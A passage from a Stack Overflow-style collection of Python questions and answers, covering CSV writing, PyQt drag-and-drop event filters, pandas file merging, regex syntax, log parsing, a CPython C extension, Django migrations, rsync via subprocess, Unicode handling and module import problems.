Memphis, 10, 67, 48.7, 22.4, 5.1, 8.3, 1.6, 0.4, 3.9, 4.1, 4.3, 0.8, 7.7-17.7, .434, 2.5-7.0, .358, 4.6-5.7, .813, 22.9, -2.0
Detroit, 11, 67, 49.1, 22.3, 5.8, 8.4, 1.6, 0.3, 3.7, 4.2, 4.9, 0.9, 8.4-19.1, .441, 2.0-5.5, .362, 3.5-4.4, .801, 23.2, -0.1
Minnesota, 12, 67, 47.1, 21.9, 5.3, 8.7, 2.0, 0.3, 3.6, 3.9, 4.3, 1.0, 8.1-18.7, .434, 2.2-6.5, .336, 3.5-4.2, .826, 23.3, -2.8
Portland, 13, 68, 47.8, 22.5, 5.1, 8.1, 1.8, 0.5, 3.1, 3.7, 4.1, 1.0, 8.2-18.8, .438, 2.1-5.7, .370, 4.0-5.1, .777, 23.3, -1.0
New York, 14, 68, 47.5, 21.2, 6.0, 8.5, 1.9, 0.2, 3.0, 2.6, 4.9, 1.1, 7.7-18.3, .419, 1.8-5.2, .342, 4.1-5.0, .819, 23.3, 6.4
Houston, 15, 67, 50.9, 21.3, 6.2, 9.8, 2.3, 0.3, 5.0, 4.3, 5.3, 0.9, 7.7-18.4, .417, 2.3-6.7, .351, 3.6-4.4, .809, 23.3, 6.1
Indiana, 16, 67, 49.3, 23.3, 5.9, 8.3, 1.8, 0.4, 4.6, 3.9, 5.0, 0.9, 8.3-18.8, .443, 2.3-5.8, .387, 4.3-5.3, .813, 23.7, 5.4
Chicago, 17, 65, 48.9, 22.2, 6.4, 8.6, 2.1, 0.6, 2.9, 2.8, 5.2, 1.2, 8.2-20.3, .407, 1.8-5.6, .323, 3.9-5.2, .764, 23.8, 4.7
Golden State, 18, 66, 49.3, 24.5, 5.1, 8.4, 2.4, 0.2, 3.7, 4.1, 4.0, 1.2, 9.1-21.3, .427, 2.3-6.6, .350, 4.0-5.0, .802, 23.8, -14.7
Dallas, 19, 67, 49.5, 22.1, 6.0, 8.3, 2.0, 0.4, 3.3, 4.0, 5.1, 0.9, 8.3-18.7, .440, 2.1-6.1, .347, 3.4-4.4, .778, 24.0, 2.0
Washington, 20, 66, 49.5, 23.8, 5.8, 8.2, 2.0, 0.3, 4.4, 3.9, 5.0, 0.9, 8.9-20.1, .444, 2.5-6.4, .398, 3.5-4.1, .851, 24.1, -4.6
Cleveland, 21, 66, 49.3, 22.9, 5.7, 9.1, 1.9, 0.3, 3.5, 3.3, 4.9, 0.8, 8.3-19.4, .428, 2.0-5.5, .360, 4.3-5.1, .837, 24.3, 1.0
Denver, 22, 68, 48.6, 21.8, 5.9, 8.8, 1.9, 0.5, 3.3, 3.8, 4.9, 1.0, 7.8-17.9, .436, 2.4-6.5, .369, 3.9-4.9, .783, 24.5, 5.8
Philadelphia, 23, 67, 48.6, 21.9, 6.0, 8.8, 2.3, 0.5, 4.1, 3.4, 5.0, 0.9, 8.0-17.8, .447, 1.7-4.7, .366, 4.2-5.0, .837, 24.7, 2.8
Oklahoma City, 24, 67, 48.1, 22.6, 6.1, 8.5, 2.1, 0.3, 3.1, 3.8, 5.0, 1.1, 8.2-18.7, .440, 2.4-5.9, .405, 3.8-5.0, .750, 24.8, -10.4
Orlando, 25, 66, 49.6, 22.9, 6.7, 9.2, 1.9, 0.6, 4.3, 3.5, 5.7, 1.0, 8.2-18.5, .444, 2.3-6.1, .385, 4.2-5.2, .794, 25.6, 5.7
Brooklyn, 26, 67, 48.5, 23.0, 5.5, 9.0, 2.4, 0.3, 3.5, 3.2, 4.5, 1.0, 8.6-18.6, .463, 2.6-6.6, .390, 3.3-4.3, .768, 25.8, 3.4
Sacramento, 27, 66, 49.7, 23.7, 5.9, 9.5, 2.3, 0.4, 4.0, 3.6, 4.8, 1.0, 8.6-19.8, .436, 2.6-7.5, .346, 3.9-4.7, .834, 25.9, -0.3
New Orleans, 28, 66, 49.9, 24.3, 5.7, 8.9, 1.6, 0.4, 3.5, 3.6, 4.8, 0.9, 8.7-18.2, .475, 2.6-6.3, .415, 4.4-5.3, .821, 26.9, 0.8
L.A.Lakers, 29, 68, 49.5, 24.5, 6.0, 9.8, 1.9, 0.4, 3.4, 3.3, 4.9, 1.1, 9.3-20.6, .449, 2.3-6.7, .349, 3.6-4.5, .818, 26.9, 4.8
Phoenix, 30, 67, 49.0, 25.3, 5.8, 9.5, 2.3, 0.4, 4.1, 4.0, 4.7, 1.1, 9.2-20.3, .452, 2.6-6.6, .388, 4.4-5.6, .788, 27.0, 7.1
But when opened in Excel, each value is in its own cell and they're all in the first row. I want a new row for each team.
Answer: Use [`csv.writer`](https://docs.python.org/2/library/csv.html#csv.writer) to
write CSV data to a CSV file:
import csv
import requests
from bs4 import BeautifulSoup
r = requests.get('http://www.hoopsstats.com/basketball/fantasy/nba/opponentstats/16/12/eff/1-1')
soup = BeautifulSoup(r.text, "html.parser")
with open("output.csv", "w") as f:
writer = csv.writer(f)
for table in soup.find_all('table', class_='statscontent'):
team = table.find('a').text
stats = [team] + [stat.text for stat in table.find_all('center')]
writer.writerow(stats)
Now, in the `output.csv` the following content would be written:
Boston,1,67,47.9,19.6,5.2,7.2,1.8,0.5,4.3,4.1,4.3,0.9,6.8-16.1,.421,1.6-4.9,.324,4.4-5.4,.816,19.7,-6.8
San Antonio,2,67,47.8,19.7,5.0,8.7,1.9,0.3,3.5,3.3,4.2,0.8,7.4-18.0,.411,1.5-4.6,.317,3.4-4.2,.819,20.7,-2.4
Atlanta,3,67,48.7,19.2,5.6,8.4,2.3,0.6,4.1,3.7,4.6,1.0,7.1-17.6,.401,2.0-5.8,.338,3.2-3.8,.828,20.8,-5.6
Miami,4,67,49.8,20.6,5.2,8.0,1.9,0.3,3.2,3.6,4.3,0.9,7.6-18.5,.407,1.9-5.3,.348,3.7-4.5,.814,21.0,2.1
L.A.Clippers,5,66,48.2,21.0,5.7,8.7,1.9,0.2,4.1,4.5,4.6,1.1,7.6-18.7,.405,1.9-5.4,.346,3.9-4.9,.799,21.1,-7.0
Toronto,6,66,48.0,20.5,5.3,8.8,1.7,0.6,3.8,3.7,4.4,0.9,7.4-18.0,.412,2.1-5.9,.349,3.6-4.4,.826,21.6,-4.3
Charlotte,7,66,48.1,19.3,6.0,9.1,1.6,0.6,3.4,4.1,5.1,0.9,7.1-17.8,.399,2.0-6.4,.321,3.0-3.7,.802,21.7,-4.5
Milwaukee,8,68,48.8,19.3,5.4,9.1,1.9,0.3,4.2,3.5,4.6,0.8,6.8-15.9,.425,1.9-6.0,.311,3.9-5.0,.788,21.7,2.1
...
Sacramento,27,66,49.7,23.7,5.9,9.5,2.3,0.4,4.0,3.6,4.8,1.0,8.6-19.8,.436,2.6-7.5,.346,3.9-4.7,.834,25.9,-0.3
New Orleans,28,66,49.9,24.3,5.7,8.9,1.6,0.4,3.5,3.6,4.8,0.9,8.7-18.2,.475,2.6-6.3,.415,4.4-5.3,.821,26.9,0.8
L.A.Lakers,29,68,49.5,24.5,6.0,9.8,1.9,0.4,3.4,3.3,4.9,1.1,9.3-20.6,.449,2.3-6.7,.349,3.6-4.5,.818,26.9,4.8
Phoenix,30,67,49.0,25.3,5.8,9.5,2.3,0.4,4.1,4.0,4.7,1.1,9.2-20.3,.452,2.6-6.6,.388,4.4-5.6,.788,27.0,7.1
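Since the question uses Python 3.5, it may also be worth opening the file with `newline=''` (as the csv docs recommend) so that Excel on Windows does not show blank rows between records; this is an assumption about the environment:
with open("output.csv", "w", newline="") as f:
    writer = csv.writer(f)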
|
EventFilter for Drop-Events within QTableView
Question: I am trying to create a QTableView that can handle drop events. For reasons of
application architecture, I want that to be done by an eventFilter of mine
(that handles some QAction-triggers for clipboard interaction as well). But
the drop-event does not seem to get through to the eventFilter.
I do not care where the data are dropped within the view. That is one of the
reasons I want it to be handled by that eventFilter and not by the model.
Furthermore, I do not want the model to pop up a dialog ("Are you sure to drop
so many elements?"), because user interaction should be done by gui elements.
btw: It **did** actually work in Qt4/PySide.
I set up an example code snippet to illustrate the problem. The interesting thing about this is that QDropEvents _can_ appear, but only in the headers of the item view.
#!/usr/bin/env python2.7
# coding: utf-8
from PyQt5.QtWidgets import (
QApplication,
QMainWindow,
QTableView,
QWidget,
)
from PyQt5.QtCore import (
Qt,
QStringListModel,
QEvent
)
app = QApplication([])
window = QMainWindow()
# Table View with Drop-Options
view = QTableView(window)
view.setDropIndicatorShown(True)
view.setDragEnabled(True)
view.setAcceptDrops(True)
view.setDragDropMode(QTableView.DragDrop)
view.setDefaultDropAction(Qt.LinkAction)
view.setDropIndicatorShown(True)
window.setCentralWidget(view)
# Simple Event Filter for TableView
class Filter(QWidget):
def eventFilter(self, widget, event):
print widget, event, event.type()
if event.type() in (QEvent.DragEnter, QEvent.DragMove, QEvent.Drop):
print "Drag'n'Drop-Event"
if event.type() != QEvent.Drop:
print "\tbut no DropEvent"
event.acceptProposedAction()
else:
print "\tan actual DropEvent"
return True
return False
filter = Filter(window)
view.installEventFilter(filter)
class MyModel(QStringListModel):
# Model with activated DragDrop functionality
# for the view
def supportedDragActions(self):
print "asks supported drop actions"
return Qt.LinkAction | Qt.CopyAction
def canDropMimeData(self, *args):
print "canDropMimeData"
return True
def dropMimeData(self, *args):
print "dropMimeData"
return True
model = MyModel("Entry_A Entry_B Entry_C".split())
view.setModel(model)
window.show()
window.raise_()
app.exec_()
**Final question:** What widget handles the QDropEvents within the QTableView,
or what widget should I install the eventFilter on?
Answer: `view.viewport()` gets all the remaining events. So simply **adding**
view.viewport().installEventFilter(filter)
will do.
|
python, pandas, csv import and more
Question: I have seen many questions in regards to importing multiple csv files into a
pandas dataframe. My question is how can you import multiple csv files but
ignore the last csv file in your directory? I have had a hard time finding the
answer to this.
Also, let's assume that the CSV file names are all different, which is why the glob pattern is "/*.csv". Any resource would also be greatly appreciated. Thank you!
path =r'C:\DRO\DCL_rawdata_files' # use your path
allFiles = glob.glob(path + "/*.csv")
frame = pd.DataFrame()
list_ = []
for file_ in allFiles:
df = pd.read_csv(file_,index_col=None, header=0)
list_.append(df)
frame = pd.concat(list_)
Answer: Try this:
import os
import glob
import pandas as pd
def get_merged_csv(flist, **kwargs):
return pd.concat([pd.read_csv(f, **kwargs) for f in flist], ignore_index=True)
path =r'C:\DRO\DCL_rawdata_files' # use your path
fmask = os.path.join(path, '*.csv')
allFiles = sorted(glob.glob(fmask), key=os.path.getmtime)
frame = get_merged_csv(allFiles[:-1], index_col=None, header=0)
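Note that sorting by `os.path.getmtime` treats "last" as the most recently modified file; if "last" means the alphabetically last file name instead (an assumption about the intent), sort by name:
allFiles = sorted(glob.glob(fmask))          # lexicographic order
frame = get_merged_csv(allFiles[:-1], index_col=None, header=0)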
|
Python regular expression syntax error
Question: I am trying to write a regular expression that will match a `-` (dash),
followed by as many letters as it possibly can. What I have at the moment, is
the following: `exp = (-[a-z A-z]*)`.
I am getting a `SyntaxError: invalid syntax` error though.
Answer: Try placing your expression in a string:
import re
exp = re.compile('(-[a-z A-z]*)')
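As a side note about the pattern itself (separate from the syntax error): `[a-z A-z]` also matches a space, and the `A-z` range covers a few punctuation characters between `Z` and `a`; if the intent is "letters only", `[A-Za-z]` is probably what was meant:
exp = re.compile(r'-[A-Za-z]*')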
cheers
|
Python counter to text file
Question: So I'm trying to analyse a log file and extract information from it. One of the things I'm trying to do is extract a list of IP addresses that have more than 30 failed attempts. Here, a failed attempt is a line that starts with "failed password for".
I had an idea for this that I wanted to try, as I wasn't sure whether it would work: use Python to create a counter that looks for the keyword "failed", then total and print it out.
This is what I have so far:
failed_line=0
with open('blacklisttips.txt') as f2:
lines= f1.readlines()
for i, line in enumerate (lines):
if line.startswith(failed_line):
f2.write(line)
f2.write(lines[i+1])
Answer: So let's say your file looks like this:
failed password for 192.168.1.1
failed password for 192.168.1.2
...
more similar lines
import collections
prefix = "failed password for"
with open('path/to/file') as infile:
    counts = collections.Counter(
        line.rsplit(" ", 1)[1].strip()
        for line in infile
        if line.startswith(prefix)
    )
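To keep only the addresses with more than 30 failed attempts (the threshold from the question), the counter can then be filtered, for example:
blacklist = [ip for ip, n in counts.items() if n > 30]
print(blacklist)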
|
Cython : How wrap C function that takes a void* pointer / how to call it from python
Question: I'm trying to wrap some functions defined in a DLL using Cython. The difficulty is that lots of these functions use void* pointers. Here is an example of the function prototypes:
---------------"header.h"-----------------------
typedef void* HANDLE
int open(HANDLE* a_handle_pointer , int open_mode)
int use(HANDLE a_handle, int usage_mode )
The usage example in C is:
---------------"main.c" -----------------
#include"header.h"
HANDLE my_handle ;
int results ;
if(open(&my_handle ,1) == 0) /* open a handle with mode 1 */
{
printf ("failed to open \n);
return 0;
}
else printf("open success \n");
use(my_handle, 2); /* use the handle (opened with open) in mode 2 */
As you can see, the "use" function can't do anything unless the handle has already been opened using the "open" function, which makes it confusing in Python/Cython. Here is how I define my function "open" in Cython (one of several trials):
from libc.stdint cimport uintptr_t
cdef extern from "header.h":
ctypedef void* HANDLE
int open(HANDLE* a_handle_pointer , int open_mode)
def Open(uintptr_t a_handle_pointer, int open_mode):
return open(<HANDLE*> a_handle_pointer , open_mode)
I have tried to cast the void* pointer to uintptr_t as some people advise, but I still get the error "TypeError: an integer is required" when calling the function.
>>>from my_module import open
>>>open (handle , 1)
How would you solve this problem? I'm wondering how I would call a function from Python with an argument of type void* or void**. Your suggestions and answers are welcome!
Answer: Writing the module/binding in Python itself is a _bad_ idea, especially if pointers are involved. You should rather do it in C with something like this... **Warning**: This is specific to CPython 3+. CPython 2 extensions are coded differently! **BTW**: I renamed your `open` function to `load` because it conflicts with POSIX's [`open(3)`](http://linux.die.net/man/3/open).
// my_module.c: My Python extension!
/* Get us the CPython headers.
*/
#include "Python.h"
/* And your function's headers, of course.
*/
#include "header.h"
/* Actual structures used to store
* a 'my_module.Handle' internally.
*/
typedef struct
{
PyObject_HEAD /* The base of all PyObjects. */
HANDLE handle; /* Our handle, great! */
} my_module_HandleObject;
/* The type 'my_module.Handle'. This variable contains
* a lot of strange, zero, and NULLified fields. Their
* purpose and story is too obscure for SO, so better
* off look at the docs for more details.
*/
static PyTypeObject my_module_HandleType =
{
PyVarObject_HEAD_INIT(NULL, 0)
"my_module.Handle", /* Of course, this is the type's name. */
sizeof(my_module_HandleObject), /* An object's size. */
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, /* ... Don't ask. */
Py_TPFLAGS_DEFAULT, /* The type's flags. There's nothing special about ours, so use the defaults. */
NULL /* No docstrings for you! */
};
/* The "wrapper" function. It takes a tuple of
* CPython PyObject's and returns a PyObject.
*/
static PyObject *my_module_load(PyObject *self, PyObject *args)
{
int load_mode;
if(!PyArg_ParseTuple(args, "i", &load_mode)) { /* Parse the argument list. It should have one single integer ("i") parameter. */
return NULL;
}
/* Create a Handle object, so as to put
* in it the handle we're about to get.
*/
my_module_HandleObject *the_object = PyObject_New(my_module_HandleObject, &my_module_HandleType);
if(the_object == NULL) {
return NULL;
}
/* Finally, do our stuff.
*/
if(load(&the_object->handle, load_mode) == -1) {
Py_DECREF(the_object);
PyErr_SetFromErrno(NULL);
return NULL;
}
return (PyObject*)the_object;
}
/* The method table. It is a list of structures, each
* describing a method of our module.
*/
static struct PyMethodDef my_module_functions[] =
{
{
"load", /* The method's name, as seen from Python code. */
(PyCFunction)my_module_load, /* The method itself. */
METH_VARARGS, /* This means the method takes arguments. */
NULL, /* We don't have documentation for this, do we? */
}, { NULL, NULL, 0, NULL } /* End of the list. */
};
/* Used to describe the module itself. */
static struct PyModuleDef my_module =
{
PyModuleDef_HEAD_INIT,
"my_module", /* The module's name. */
NULL, /* No docstring. */
-1,
my_module_functions,
NULL, NULL, NULL, NULL
};
/* This function _must_ be named this way
* in order for the module to be named as
* 'my_module'. This function is sort of
* the initialization routine for the module.
*/
PyMODINIT_FUNC PyInit_my_module()
{
my_module_HandleType.tp_new = PyType_GenericNew; /* AFAIK, this is the type's constructor. Use the default. */
if(PyType_Ready(&my_module_HandleType) < 0) { // Uh, oh. Something went wrong!
return NULL;
}
PyObject *this_module = PyModule_Create(&my_module); /* Export the whole module. */
if(this_module == NULL) {
return NULL;
}
Py_INCREF(&my_module_HandleType);
PyModule_AddObject(this_module, "Handle", (PyObject*)&my_module_HandleType);
return this_module;
}
In order to build and install the extension, [see the docs on
`distutils`](https://docs.python.org/2/extending/building.html#building).
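To build it, a minimal `setup.py` along these lines should work (a sketch: it assumes the C source above is saved as `my_module.c`, and that the library providing `load` is linked in, e.g. via the `libraries` argument of `Extension`):
from distutils.core import setup, Extension

setup(
    name='my_module',
    version='0.1',
    ext_modules=[Extension('my_module', sources=['my_module.c'])],
)
After `python3 setup.py build_ext --inplace`, `import my_module` followed by `handle = my_module.load(1)` should return a Handle object wrapping the opened HANDLE.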
|
Testing Equality of boto Price object
Question: I am using the Python package boto to connect Python to MTurk. I need to
award bonus payments, which are of the Price type. I want to test if one Price
object equals a certain value. Specifically, when I want to award bonus
payments, I need to check that their bonus payment is not 0 (because when you
try to award a bonus payment in MTurk, it needs to be positive). But when I go
to check values, I can't do this. For example,
from boto.mturk.connection import MTurkConnection
from boto.mturk.price import Price
a = Price(0)
a == 0
a == Price(0)
a == Price(0.0)
a > Price(0)
a < Price(0)
c = Price(.05)
c < Price(0)
c < Price(0.0)
These yield unexpected answers.
I am not sure how to test if a has a Price equal to 0. Any suggestions?
Answer: I think you'll want the Price.amount attribute to compare these values. Otherwise it compares objects, or some other goofiness. It'd be smart for the library to override the standard equality test to make this more developer-friendly.
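A minimal sketch of that comparison, assuming `Price` exposes the numeric value as an `amount` attribute:
a = Price(0)
c = Price(.05)
if c.amount > 0:      # compare the numbers, not the Price objects
    print("bonus can be awarded:", c.amount)
if a.amount == 0:
    print("skipping the zero bonus")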
|
How to construct a callable from a Python code object?
Question: _Realize this is a rather obscure question, so I'll explain why I'm looking
into this._
A Python jit compiler takes a callable and returns a callable.
This is fine, however - the API I'm currently working with uses a Python code
object.
A simplistic answer to this question would be to write a function to execute
the code, eg:
def code_to_function(code):
def fn():
return eval(code)
return fn
# example use
code = compile("1 + 1", '<string>', 'eval')
fn = code_to_function(code)
print(fn()) # --> 2
Which is correct, but in this case the jit (numba, as it happens) won't evaluate the actual number-crunching parts, which is what it needs to do to be useful.
So the question is, how to take a code object which evaluates to a value, and
convert/construct a callable from it?
* * *
Update, thanks to @jsbueno's answer, [here's an example of a simple expression
evaluator using
numba](https://gist.github.com/ideasman42/c9ef91230ac67de6572f).
Answer:
from types import FunctionType
new_function = FunctionType(code, globals[, name[, argdefs[, closure]]])
The remaining parameters above may be taken from the original function you
have.
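For instance, reusing the expression from the question (a small sketch; only the `code` and `globals` arguments are required):
from types import FunctionType

code = compile("1 + 1", '<string>', 'eval')
fn = FunctionType(code, globals())
print(fn())  # --> 2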
|
GET request working through Python but not through Postman
Question: I am trying to use the Mailman 3 REST API, but I need to call it from Spring's
Rest Template in a Java class, or for testing purposes from Postman. In Python, I can call the API like this:
>>> from httplib2 import Http
>>> headers = {
... 'Content-Type': 'application/x-www-form-urlencode',
... 'Authorization': 'Basic cmVzdGFkbWluOnJlc3RwYXNz',
... }
>>> url = 'http://localhost:8001/3.0/domains'
>>> response, content = Http().request(url, 'GET', None, headers)
>>> print(response.status)
200
I want to make the same request, but through Postman. For that, I have used
the URL "<http://127.0.0.1:8001/3.0/domains>". I have added 2 fields in the
headers, the preview looks like:
GET /3.0/lists HTTP/1.1
Host: 127.0.0.1:8001
Content-Type: application/x-form-urlencode
Authorization: Basic cmVzdGFkbWluOnJlc3RwYXNz
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
But the request status only shows "pending" and I receive no response. Mailman
is running on a python virtualenv.
I am also trying to run the following command in my terminal:
curl --header "Content-Type: application/x-form-urlencoded, Authorization: Basic cmVzdGFkbWluOnJlc3RwYXNz" http://localhost:8001/3.0/domains
But the output is:
{
"title": "401 Unauthorized",
"description": "The REST API requires authentication"
}
I am stuck at this point, because I do not wish to use Mailman's Web UI Postorius, but want to call the REST API from a Java class. I would also like to know if I am making a particular mistake in forming my Postman request, and how I can do the same using Spring's Rest Template.
Any help would be appreciated. Thank you.
Answer: To fix the curl command, pass each header with a separate -H parameter:
curl -H "Content-Type: application/x-form-urlencoded" -H "Authorization: Basic cmVzdGFkbWluOnJlc3RwYXNz" http://localhost:8001/3.0/domains
|
PyYAML with Python 3.x
Question: I've a problem using the _yaml_ (PyYAML 3.11) library in Python 3.x. When I
call `import yaml` I get the following error:
Python 3.4.3+ (default, Oct 14 2015, 16:03:50)
[GCC 5.2.1 20151010] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import yaml
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/mlohr/python-libs/yaml/__init__.py", line 2, in <module>
from error import *
ImportError: No module named 'error'
`error` is a file located in the yaml directory, but the `__init__.py` from yaml does not use absolute imports. I guess that's the problem, but I'm not sure. At <http://pyyaml.org/wiki/PyYAMLDocumentation#Python3support> there is a short section about (supposed) Python 3 support, so I'm not sure if I'm using it the wrong way.
The same issue occurs (that's the way I found the problem) when using Python 3
with python scripts using yaml.
With Python 2.7 and 2.6 it works without problems.
Any idea/suggestion how to get that working?
Answer: It would seem that you're either using an old version of `PyYAML` after all or
using a Python2 installation of `PyYAML` with Python3 as suggested in an
[other answer](http://stackoverflow.com/a/36055462/2681632), because in your
traceback we see
from error import *
which is not an absolute import. You should either upgrade, reinstall `PyYAML`
with Python3 sources in your environment, or create a new environment for
Python3 packages.
|
Issues with activating models in Django
Question: I'm following this tutorial
<https://docs.djangoproject.com/en/1.9/intro/tutorial02/> to learn Django.
Here is the code for my models.py file.
from __future__ import unicode_literals
from django.db import models
# Create your models here
class Question(models.Model):
question_text = models.CharField(max_length=200)
pub_date = models.DateTimeField('date published')
class Choice(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
choice_text = models.CharField(max_length=200)
votes = models.IntegerField(default=0)
When I run the following command:
python manage.py makemigrations polls
I see that only the Question model is being created and not the Choice model. When I try to edit the models.py file and rerun the 'makemigrations polls' command, I get the following error:
You are trying to add a non-nullable field 'pub_date' to question without a default; we can't do that (the database needs something to populate existing rows).
Please select a fix:
1) Provide a one-off default now (will be set on all existing rows)
2) Quit, and let me add a default in models.py
Select an option:
I'm not sure what's wrong with the code here. Can someone please help me out?
Answer: You've got out of sync. Delete your database file, and the Python files under
polls/migrations, and run makemigrations again.
This was caused by you not having the pub_date field when you initially
migrated. There are ways of fixing this, but for the purposes of the tutorial,
you should just start again.
|
`subprocess.call` operates differently to running command directly in shell
Question: I have the following command in Python, which I wrote with the aim of copying
only `.yaml` files from a `source` directory (on the network) to a local
`target` directory:
import subprocess as sp
cmd = ['rsync', '-rvt', "--include='*/*.yaml'", "--exclude='*/*'",
source , destination]
print ' '.join(cmd)
sp.call(cmd)
However, when I run this Python, _all_ files are copied, including `.jpg` etc.
* * *
When I run the shell command directly:
rsync -rvt --include='*/*.yaml' --exclude='*/*' <source> <target>
...then only `.yaml` files are copied, as expected.
* * *
What is going on here? Why does the command operate differently in shell than
under `subprocess.call`?
(This is with a Bash shell on Ubuntu 14.04, using Anaconda's Python 2)
Answer: You should remove the single quotes around the wildcards:
['rsync', '-rvt', "--include=*/*.yaml", "--exclude=*/*", source , destination]
Those quotes are processed by the shell, the shell doesn't pass in the quotes
to rsync.
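Putting it together, the corrected call would look like this (with source and destination as defined in the question):
import subprocess as sp

cmd = ['rsync', '-rvt', '--include=*/*.yaml', '--exclude=*/*', source, destination]
sp.call(cmd)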
|
How to write symbol in csv file?
Question: I am trying to write a username and a symbol into my CSV file from Python code, but whenever my loop comes to that line it skips that record and writes the next record to the file. Thank you in advance. Please help me with writing the symbol into the CSV file.
For example: I want to write (Simeon Miller ✪) into the name column.
Answer: Python doesn't magically skip records unless you explicitly code that.
Assuming the data is of type `unicode` you have to encode it before writing it
to the file. UTF-8 is a safe bet because that encoding can encode all possible
characters in `unicode` strings.
#!/usr/bin/env python
# coding: utf-8
import csv
def main():
data = [[u'Simeon Miller ✪', 42], [u'Roger Rabbit', 4711]]
with open('test.csv', 'wb') as csv_file:
writer = csv.writer(csv_file)
for name, number in data:
writer.writerow([name.encode('utf-8'), str(number)])
if __name__ == '__main__':
main()
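If this ever runs under Python 3 instead (an assumption; the script above targets Python 2), the csv module handles Unicode natively, so the manual encode step goes away:
with open('test.csv', 'w', newline='', encoding='utf-8') as csv_file:
    writer = csv.writer(csv_file)
    for name, number in data:
        writer.writerow([name, number])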
|
Unable to import nltk on mac os x
Question: I had successfully installed nltk [from this site](http://www.nltk.org/install.html), and just to validate, I am able to import it from the terminal. But when I execute my Python script from Spyder, it gives me the following error in Spyder's terminal:
File "/Prateek/Python/RC_ISSUES/algorithm_RC.py", line 9, in <module>
import nltk
ImportError: No module named nltk
Below output is from the terminal
[](http://i.stack.imgur.com/Y84Ij.png)
I know there might be similar questions, but I think this one is different from the rest.
Answer: When you execute a python script, the operating system is looking for the
interpreter as specified on the first line of the script, which most of the
time is:
#!/usr/bin/python
On Mac OS X, this is the Python distributed with the system. It is usually the one that has the older compilation date:
2.7.10 (default, Jun 1 2015, 09:45:55) [GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.57)]
If you do `type python` in your shell, you're very likely to see another path
to that interpreter, e.g. if you installed the brew version of python:
% type python
python is /usr/local/bin/python
So you have two ways around it, either you explicitly launch your script with
python:
python algorithm_RC.py
If in doubt, use the full path you found out with `type`:
/usr/local/bin/python algorithm_RC.py
or, you can change your script first line with:
#!/usr/bin/env python
which will use the same python as the one you're reaching from your shell. You
can also use the full path to your manually installed python, by making that
line:
#!/usr/local/bin/python
or whatever the `type` command gave. But I would advise you against that, as
the `/usr/bin/env` solution is more flexible and makes sure you're using in
both cases the same python from the shell and within the script.
Finally, you can also install it for the system's python by explicitly calling the pip from `/usr/bin`:
sudo /usr/bin/pip install nltk
And if you don't have pip there, then you'll have to install it first:
sudo /usr/bin/easy_install pip
HTH
|
Displaying JSON specific JSON result in Python
Question: I'm new to Python and have the following code:
def doSentimentAnalysisAndPrint(keyval):
import urllib
data = urllib.urlencode(keyval)
u = urllib.urlopen("http://text-processing.com/api/sentiment/", data)
json_string = u.read()
parsed_json = json.loads(json_string)
# print the various key:values
print(parsed_json['probability'])
print ">>", parsed_json['label']
The printed result is:
{u'neg': 0.24087437946650492, u'neutral': 0.19184084028194423, u'pos': 0.7591256205334951}
>> pos
I would like to print out only the actual result, e.g. in this case "Positive: 0.7591256205334951", but I don't know how to achieve this.
Answer: Do read the [API documentation](http://text-
processing.com/docs/sentiment.html) when using one. The `'label'` key points
to what key in the `'probability'` dictionary is the determined sentiment:
> **label:** will be either `pos` if the text is determined to be _positive_ ,
> `neg` if the text is _negative_ , or `neutral` if the text is neither `pos`
> nor `neg`.
>
> **probability:** an object that contains the probability for each label.
> `neg` and `pos` will add up to 1, while `neutral` is standalone. If
> `neutral` is greater than `0.5` then the `label` will be `neutral`.
> Otherwise, the `label` will be `pos` or `neg`, whichever has the greater
> probability.
So you already have a label, and the corresponding value is just a key lookup.
Map the label values to a string to print (like `pos` mapping to `Positive`), and combine the two:
sentiments = {'pos': 'Positive', 'neg': 'Negative', 'neutral': 'Neutral'}
label = parsed_json['label']
print sentiments[label], parsed_json['probability'][label]
|
How to detect ASCII characters on a string in python
Question: I'm working on a tool in Maya where, at some point, the user can enter a comment in a textField. This comment will later be used as part of the filename that's going to be saved. I work in France, so the user might use some accented characters such as "é" or "à".
What I would love would be to just translate them to their non-accented counterparts. However, I realise this is quite tricky, so I would be OK with just detecting them so I can issue a warning message to the user. I don't want to simply strip the offending letters, as it might make the comment incomprehensible.
I know there are some similar questions around here, but they're all about other languages I don't know/understand (such as C++ or PHP).
Here's what I found so far around the web :
import re
comment = 'something written with some french words and numbers'
if re.match(r'^[A-Za-z0-9_]+$', comment):
# issue a warning for the user
This first solution doesn't work because it treats accented characters as acceptable.
I found this :
ENGLISH_CHARS = re.compile('[^\W_]', re.IGNORECASE)
ALL_CHARS = re.compile('[^\W_]', re.IGNORECASE | re.UNICODE)
assert len(ENGLISH_CHARS.findall('_àÖÎ_')) == 0
assert len(ALL_CHARS.findall('_àÖÎ_')) == 3
which I thought about using like this :
ENGLISH_CHARS = re.compile('[^\W_]', re.IGNORECASE)
if len(ENGLISH_CHARS .findall(comment)) != len(comment):
# issue a warning for the user
but it only seems to work if the string is wrapped in underscores. I'm really sorry if this is a duplicate of something I haven't found or understood, but it's been driving me nuts.
Answer: The [unicode](https://docs.python.org/2/howto/unicode.html) built-in tries to decode your byte string with the given encoding. It will default to ASCII and raise an exception if it fails.
try:
unicode(filename)
except UnicodeDecodeError:
show_warning()
This only allows unaccented characters, which is maybe what you want.
If you already have a Unicode string, you have to encode it instead, which will raise a UnicodeEncodeError on non-ASCII characters:
filename.encode("ASCII")
Example:
>>> unicode("ää")
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc3 in position 0: ordinal not in range(128)
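For the transliteration the question mentions (stripping accents rather than just detecting them), a minimal sketch using the standard `unicodedata` module, assuming `comment` is a unicode string:
# -*- coding: utf-8 -*-
import unicodedata

comment = u"quelque chose écrit en français"
ascii_comment = unicodedata.normalize('NFKD', comment).encode('ascii', 'ignore')
print(ascii_comment)  # -> quelque chose ecrit en francais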
|
looping through folder of csvs python
